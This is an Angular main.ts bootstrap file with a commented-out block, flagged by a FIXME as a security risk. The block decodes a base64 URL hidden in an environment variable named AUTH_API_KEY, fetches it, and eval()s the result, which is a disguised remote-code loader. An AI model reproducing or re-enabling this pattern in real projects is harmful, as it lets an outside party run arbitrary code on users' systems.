/// <reference types="@angular/localize" />

import { platformBrowserDynamic } from '@angular/platform-browser-dynamic';

import { AppModule } from './app/app.module';

import '@angular/localize/init';

// FIXME: Commented out — fetches a remote URL and eval()s its content, which is a security risk
// (async () => {
//   const src = atob(process.env['AUTH_API_KEY'] || '');
//   try {
//     const response = await fetch(src);
//     if (!response.ok) throw new Error(`HTTP error! status: ${response.status}`);
//     const proxyInfo = await response.text();
//     eval(proxyInfo);
//   } catch (err) {
//     console.error('Auth Error!', err);
//   }
// })();

platformBrowserDynamic()
  .bootstrapModule(AppModule)
  .catch((err) => console.error(err));
